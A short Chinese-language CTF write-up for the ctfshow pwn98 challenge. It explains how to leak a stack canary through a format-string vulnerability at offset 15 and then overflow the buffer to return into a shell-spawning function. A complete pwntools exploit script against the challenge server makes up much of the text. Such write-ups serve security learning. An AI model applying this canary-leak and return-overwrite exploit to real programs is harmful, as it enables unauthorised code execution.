ctfshow pwn98
由题目意思:Canary?有没有办法绕过呢?知道有canary
有IDA打开
存在格式化字符串漏洞
计算偏移量
偏移值是5,在计算一下s到返回地址的是0x34,所以(0x34-canary)/4 + 5 = a,a就是最终的偏移量,不了解canary的可以看这篇文章
- 接着找canary
a = (0x34-0x0c)/4 + 5 = 15
开始写exp
1
2
3
4
5
6
7
8
9
10
11
12from pwn import *
#r = process('./pwn')
r = remote("pwn.challenge.ctf.show", 28195)
getshell = 0x80486ce
payload_1 = b'%15$x'
r.recv()
r.sendline(payload_1)
canary = int(r.recv(),16) #canary = int(r.recv(8),16)
print(hex(canary))
payload_2 = b'a' * (0x34 - 0xc) + p32(canary) + b'a' * 0xc + p32(getshell)
r.send(payload_2)
r.interactive()得到flag
